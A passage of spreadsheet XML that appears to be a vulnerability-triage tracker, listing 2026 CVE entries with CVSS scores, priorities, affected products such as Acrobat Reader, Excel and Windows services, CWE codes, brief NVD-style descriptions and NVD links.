t="inlineStr"><is><t>CVE-2026-75992</t></is></c><c r="D963" s="5" t="n"><v>7.8</v></c><c r="E963" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F963" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G963" s="5" t="inlineStr" /><c r="H963" s="5" t="n"><v>0.002</v></c><c r="I963" s="5" t="inlineStr" /><c r="J963" s="5" t="inlineStr" /><c r="K963" s="5" t="inlineStr" /><c r="L963" s="5" t="inlineStr" /><c r="M963" s="5" t="inlineStr" /><c r="N963" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O963" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P963" s="5" t="inlineStr" /><c r="Q963" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R963" s="5" t="inlineStr"><is><t>Illustrator is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S963" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75992</t></is></c></row><row r="964"><c r="A964" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B964" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C964" s="5" t="inlineStr"><is><t>CVE-2026-76957</t></is></c><c r="D964" s="5" t="n"><v>7.8</v></c><c r="E964" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F964" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G964" s="5" t="inlineStr" /><c r="H964" s="5" t="n"><v>0.001</v></c><c r="I964" s="5" t="inlineStr" /><c r="J964" s="5" t="inlineStr" /><c r="K964" s="5" t="inlineStr"><is><t>libexpat_project:libexpat</t></is></c><c r="L964" s="5" t="inlineStr" /><c r="M964" s="5" t="inlineStr" /><c r="N964" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O964" s="5" t="inlineStr"><is><t>2026-08-20</t></is></c><c r="P964" s="5" t="inlineStr" /><c r="Q964" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R964" s="5" t="inlineStr"><is><t>libexpat before 2.8.4 lacks handler call depth tracking with custom encoding callbacks. Thus, a use-after-free can occur. NOTE: this is similar to CVE-2026-50219, CVE-2026-56131 and CVE-2026-56412.</t></is></c><c r="S964" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76957</t></is></c></row><row r="965"><c r="A965" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B965" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C965" s="5" t="inlineStr"><is><t>CVE-2026-76967</t></is></c><c r="D965" s="5" t="n"><v>7.8</v></c><c r="E965" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F965" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G965" s="5" t="inlineStr" /><c r="H965" s="5" t="n"><v>0.002</v></c><c r="I965" s="5" t="inlineStr" /><c r="J965" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K965" s="5" t="inlineStr" /><c r="L965" s="5" t="inlineStr" /><c r="M965" s="5" t="inlineStr" /><c r="N965" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O965" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P965" s="5" t="inlineStr" /><c r="Q965" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R965" s="5" t="inlineStr"><is><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is></c><c r="S965" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76967</t></is></c></row><row r="966"><c r="A966" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B966" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C966" s="5" t="inlineStr"><is><t>CVE-2026-77091</t></is></c><c r="D966" s="5" t="n"><v>7.8</v></c><c r="E966" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F966" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G966" s="5" t="inlineStr" /><c r="H966" s="5" t="n"><v>0.001</v></c><c r="I966" s="5" t="inlineStr" /><c r="J966" s="5" t="inlineStr" /><c r="K966" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L966" s="5" t="inlineStr" /><c r="M966" s="5" t="inlineStr" /><c r="N966" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O966" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P966" s="5" t="inlineStr" /><c r="Q966" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R966" s="5" t="inlineStr"><is><t>DataCube contained a path traversal issue affecting security feature enforcement. Software customers upgrade to resolved maintenance release. Update Content Extractor and Index Store.</t></is></c><c r="S966" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77091</t></is></c></row><row r="967"><c r="A967" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B967" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C967" s="5" t="inlineStr"><is><t>CVE-2026-77489</t></is></c><c r="D967" s="5" t="n"><v>7.8</v></c><c r="E967" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F967" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G967" s="5" t="inlineStr" /><c r="H967" s="5" t="n"><v>0.003</v></c><c r="I967" s="5" t="inlineStr" /><c r="J967" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K96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67" s="5" t="inlineStr" /><c r="M967" s="5" t="inlineStr" /><c r="N967" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O967" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P967" s="5" t="inlineStr" /><c r="Q967" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="R967" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S967" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t></is></c></row><row r="968"><c r="A968" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B968" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C968" s="5" t="inlineStr"><is><t>CVE-2026-77500</t></is></c><c r="D968" s="5" t="n"><v>7.8</v></c><c r="E968" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F968" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G968" s="5" t="inlineStr" /><c r="H968" s="5" t="n"><v>0.003</v></c><c r="I968" s="5" t="inlineStr" /><c r="J968" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K96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68" s="5" t="inlineStr" /><c r="M968" s="5" t="inlineStr" /><c r="N968" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O968" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P968" s="5" t="inlineStr" /><c r="Q968" s="5" t="inlineStr"><is><t>CWE-763</t></is></c><c r="R968" s="5" t="inlineStr"><is><t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S968" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t></is></c></row><row r="969"><c r="A969" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B969" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C969" s="5" t="inlineStr"><is><t>CVE-2026-77503</t></is></c><c r="D969" s="5" t="n"><v>7.8</v></c><c r="E969" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F969" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G969" s="5" t="inlineStr" /><c r="H969" s="5" t="n"><v>0.002</v></c><c r="I969" s="5" t="inlineStr" /><c r="J969" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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69" s="5" t="inlineStr" /><c r="M969" s="5" t="inlineStr" /><c r="N969" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O969" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P969" s="5" t="inlineStr" /><c r="Q969" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R969" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.</t></is></c><c r="S969" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77503</t></is></c></row><row r="970"><c r="A970" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B970" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C970" s="5" t="inlineStr"><is><t>CVE-2026-77904</t></is></c><c r="D970" s="5" t="n"><v>7.8</v></c><c r="E970" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F970" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G970" s="5" t="inlineStr" /><c r="H970" s="5" t="n"><v>0.002</v></c><c r="I970" s="5" t="inlineStr" /><c r="J970" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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970" s="5" t="inlineStr" /><c r="M970" s="5" t="inlineStr" /><c r="N970" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O970" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P970" s="5" t="inlineStr" /><c r="Q970" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R970" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S970" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t></is></c></row><row r="971"><c r="A971" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B971" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C971" s="5" t="inlineStr"><is><t>CVE-2026-78447</t></is></c><c r="D971" s="5" t="n"><v>7.8</v></c><c r="E971" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F971" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G971" s="5" t="inlineStr" /><c r="H971" s="5" t="n"><v>0.002</v></c><c r="I971" s="5" t="inlineStr" /><c r="J971" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K97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71" s="5" t="inlineStr" /><c r="M971" s="5" t="inlineStr" /><c r="N971" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O971" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P971" s="5" t="inlineStr" /><c r="Q971" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R971" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S971" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78447</t></is></c></row><row r="972"><c r="A972" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B972" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C972" s="5" t="inlineStr"><is><t>CVE-2026-78448</t></is></c><c r="D972" s="5" t="n"><v>7.8</v></c><c r="E972" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F972" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G972" s="5" t="inlineStr" /><c r="H972" s="5" t="n"><v>0.002</v></c><c r="I972" s="5" t="inlineStr" /><c r="J972" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K97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972" s="5" t="inlineStr" /><c r="M972" s="5" t="inlineStr" /><c r="N972" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O972" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P972" s="5" t="inlineStr" /><c r="Q972" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R972" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S972" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78448</t></is></c></row><row r="973"><c r="A973" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B973" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C973" s="5" t="inlineStr"><is><t>CVE-2026-79907</t></is></c><c r="D973" s="5" t="n"><v>7.8</v></c><c r="E973" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F973" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G973" s="5" t="inlineStr" /><c r="H973" s="5" t="n"><v>0.002</v></c><c r="I973" s="5" t="inlineStr" /><c r="J973" s="5" t="inlineStr" /><c r="K973" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L973" s="5" t="inlineStr" /><c r="M973" s="5" t="inlineStr" /><c r="N973" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O973" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P973" s="5" t="inlineStr" /><c r="Q973" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R973" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Double Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S973" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79907</t></is></c></row><row r="974"><c r="A974" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B974" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C974" s="5" t="inlineStr"><is><t>CVE-2026-79908</t></is></c><c r="D974" s="5" t="n"><v>7.8</v></c><c r="E974" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F974" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G974" s="5" t="inlineStr" /><c r="H974" s="5" t="n"><v>0.002</v></c><c r="I974" s="5" t="inlineStr" /><c r="J974" s="5" t="inlineStr" /><c r="K974" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L974" s="5" t="inlineStr" /><c r="M974" s="5" t="inlineStr" /><c r="N974" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O974" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P974" s="5" t="inlineStr" /><c r="Q974" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R974" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S974" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79908</t></is></c></row><row r="975"><c r="A975" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B975" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C975" s="5" t="inlineStr"><is><t>CVE-2026-79909</t></is></c><c r="D975" s="5" t="n"><v>7.8</v></c><c r="E975" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F975" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G975" s="5" t="inlineStr" /><c r="H975" s="5" t="n"><v>0.002</v></c><c r="I975" s="5" t="inlineStr" /><c r="J975" s="5" t="inlineStr" /><c r="K975" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L975" s="5" t="inlineStr" /><c r="M975" s="5" t="inlineStr" /><c r="N975" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O975" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P975" s="5" t="inlineStr" /><c r="Q975" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R975" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S975" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79909</t></is></c></row><row r="976"><c r="A976" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B976" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C976" s="5" t="inlineStr"><is><t>CVE-2026-80075</t></is></c><c r="D976" s="5" t="n"><v>7.8</v></c><c r="E976" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F976" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G976" s="5" t="inlineStr" /><c r="H976" s="5" t="n"><v>0.003</v></c><c r="I976" s="5" t="inlineStr" /><c r="J976" s="5" t="inlineStr" /><c r="K976" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L976" s="5" t="inlineStr" /><c r="M976" s="5" t="inlineStr" /><c r="N976" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O976" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P976" s="5" t="inlineStr" /><c r="Q976" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R976" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Work Folders allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S976" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80075</t></is></c></row><row r="977"><c r="A977" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B977" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C977" s="5" t="inlineStr"><is><t>CVE-2026-80112</t></is></c><c r="D977" s="5" t="n"><v>7.8</v></c><c r="E977" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F977" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G977" s="5" t="inlineStr" /><c r="H977" s="5" t="n"><v>0.001</v></c><c r="I977" s="5" t="inlineStr" /><c r="J977" s="5" t="inlineStr" /><c r="K977" s="5" t="inlineStr" /><c r="L977" s="5" t="inlineStr" /><c r="M977" s="5" t="inlineStr" /><c r="N977" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O977" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P977" s="5" t="inlineStr" /><c r="Q977" s="5" t="inlineStr"><is><t>CWE-732</t></is></c><c r="R977" s="5" t="inlineStr"><is><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is></c><c r="S977" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80112</t></is></c></row><row r="978"><c r="A978" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B978" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C978" s="5" t="inlineStr"><is><t>CVE-2026-80161</t></is></c><c r="D978" s="5" t="n"><v>7.8</v></c><c r="E978" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F978" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G978" s="5" t="inlineStr" /><c r="H978" s="5" t="n"><v>0.002</v></c><c r="I978" s="5" t="inlineStr" /><c r="J978" s="5" t="inlineStr" /><c r="K978" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L978" s="5" t="inlineStr" /><c r="M978" s="5" t="inlineStr" /><c r="N978" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O978" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P978" s="5" t="inlineStr" /><c r="Q978" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="R978" s="5" t="inlineStr"><is><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is></c><c r="S978" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80161</t></is></c></row><row r="979"><c r="A979" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B979" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C979" s="5" t="inlineStr"><is><t>CVE-2026-81353</t></is></c><c r="D979" s="5" t="n"><v>7.8</v></c><c r="E979" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F979" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G979" s="5" t="inlineStr" /><c r="H979" s="5" t="n"><v>0.004</v></c><c r="I979" s="5" t="inlineStr" /><c r="J979" s="5" t="inlineStr" /><c r="K979" s="5" t="inlineStr" /><c r="L979" s="5" t="inlineStr" /><c r="M979" s="5" t="inlineStr" /><c r="N979" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O979" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P979" s="5" t="inlineStr" /><c r="Q979" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R979" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t></is></c><c r="S979" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81353</t></is></c></row><row r="980"><c r="A980" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B980" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C980" s="5" t="inlineStr"><is><t>CVE-2026-81386</t></is></c><c r="D980" s="5" t="n"><v>7.8</v></c><c r="E980" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F980" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G980" s="5" t="inlineStr" /><c r="H980" s="5" t="n"><v>0.003</v></c><c r="I980" s="5" t="inlineStr" /><c r="J980" s="5" t="inlineStr" /><c r="K980" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L980" s="5" t="inlineStr" /><c r="M980" s="5" t="inlineStr" /><c r="N980" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O980" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P980" s="5" t="inlineStr" /><c r="Q980" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R980" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S980" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81386</t></is></c></row><row r="981"><c r="A981" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B981" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C981" s="5" t="inlineStr"><is><t>CVE-2026-81388</t></is></c><c r="D981" s="5" t="n"><v>7.8</v></c><c r="E981" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F981" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G981" s="5" t="inlineStr" /><c r="H981" s="5" t="n"><v>0.004</v></c><c r="I981" s="5" t="inlineStr" /><c r="J981" s="5" t="inlineStr" /><c r="K981" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L981" s="5" t="inlineStr" /><c r="M981" s="5" t="inlineStr" /><c r="N981" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O981" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P981" s="5" t="inlineStr" /><c r="Q981" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R981" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S981" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81388</t></is></c></row><row r="982"><c r="A982" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B982" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C982" s="5" t="inlineStr"><is><t>CVE-2026-81396</t></is></c><c r="D982" s="5" t="n"><v>7.8</v></c><c r="E982" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F982" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G982" s="5" t="inlineStr" /><c r="H982" s="5" t="n"><v>0.004</v></c><c r="I982" s="5" t="inlineStr" /><c r="J982" s="5" t="inlineStr" /><c r="K982" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L982" s="5" t="inlineStr" /><c r="M982" s="5" t="inlineStr" /><c r="N982" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O982" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P982" s="5" t="inlineStr" /><c r="Q982" s="5" t="inlineStr"><is><t>CWE-121, CWE-193</t></is></c><c r="R982" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S982" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81396</t></is></c></row><row r="983"><c r="A983" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B983" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C983" s="5" t="inlineStr"><is><t>CVE-2026-81397</t></is></c><c r="D983" s="5" t="n"><v>7.8</v></c><c r="E983" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F983" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G983" s="5" t="inlineStr" /><c r="H983" s="5" t="n"><v>0.004</v></c><c r="I983" s="5" t="inlineStr" /><c r="J983" s="5" t="inlineStr" /><c r="K983" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L983" s="5" t="inlineStr" /><c r="M983" s="5" t="inlineStr" /><c r="N983" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O983" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P983" s="5" t="inlineStr" /><c r="Q983" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R983" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S983" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81397</t></is></c></row><row r="984"><c r="A984" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B984" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C984" s="5" t="inlineStr"><is><t>CVE-2026-81398</t></is></c><c r="D984" s="5" t="n"><v>7.8</v></c><c r="E984" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F984" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G984" s="5" t="inlineStr" /><c r="H984" s="5" t="n"><v>0.003</v></c><c r="I984" s="5" t="inlineStr" /><c r="J984" s="5" t="inlineStr" /><c r="K984" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L984" s="5" t="inlineStr" /><c r="M984" s="5" t="inlineStr" /><c r="N984" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O984" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P984" s="5" t="inlineStr" /><c r="Q984" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R984" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S984" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81398</t></is></c></row><row r="985"><c r="A985" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B985" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C985" s="5" t="inlineStr"><is><t>CVE-2026-81947</t></is></c><c r="D985" s="5" t="n"><v>7.8</v></c><c r="E985" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F985" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G985" s="5" t="inlineStr" /><c r="H985" s="5" t="n"><v>0.003</v></c><c r="I985" s="5" t="inlineStr" /><c r="J985" s="5" t="inlineStr" /><c r="K985" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L985" s="5" t="inlineStr" /><c r="M985" s="5" t="inlineStr" /><c r="N985" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O985" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P985" s="5" t="inlineStr" /><c r="Q985" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R985" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S985" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81947</t></is></c></row><row r="986"><c r="A986" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B986" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C986" s="5" t="inlineStr"><is><t>CVE-2026-81948</t></is></c><c r="D986" 